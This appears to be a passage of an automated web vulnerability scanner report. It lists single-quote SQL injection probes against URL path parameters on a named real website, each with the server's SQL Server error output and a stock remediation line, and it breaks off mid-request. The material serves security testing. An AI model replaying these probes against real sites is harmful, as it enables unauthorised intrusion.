<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15''/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=EFKAFEIDJGAIPNMDLIABCNGE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 16 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 16, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom'/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=JFKAFEIDPFFPDOOJDMMMCBBA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom''/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=NFKAFEIDMGBDGNGCIHAMCBLD; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 17 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 17, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1'/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CGKAFEIDIHDHFNMPDPFKDFDA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1''/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=EGKAFEIDMBENOCDEIFKDNGMP; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 18 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 18, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid'/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=LGKAFEIDPCPONBOBPPMGLACC; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid''/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=OGKAFEIDONKGALJJNDIOGPKD; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 19 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 19, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:'/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CHKAFEIDMEGCMAFLEKBHIABE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:''/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=GHKAFEIDAPJEFENGHJKNKHLN; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles'/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23740 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CNJAFEIDLGGIANOLMJFJLNJP; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles''/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41842 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=FNJAFEIDOOAODEDJCHPMPHII; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 20 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 20, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh'/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=JHKAFEIDOEKFEGEAAPDICJCD; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh''/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=MHKAFEIDEAMLAOMPHLGBBJEF; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 21 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 21, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106'/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CIKAFEIDMGNOBDFJBDJGBMCB; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106''/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=IIKAFEIDBKBHNPANPPNJNBMP; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 22 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 22, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw'/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=OIKAFEIDLHEGDDDCJNJENFIN; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw''/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CJKAFEIDPODPNONOEMEJPFJC; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 23 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 23, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134'/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=GJKAFEIDMGBHHIGNJAFPDNAA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134''/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=IJKAFEIDALBLOIMEMIEFAGBO; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 24 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 24, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei'/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=NJKAFEIDMMDANFHNMIECIGHI; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei''/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CKKAFEIDFEACDJHOBAINPDEL; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 25 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 25, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw'/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
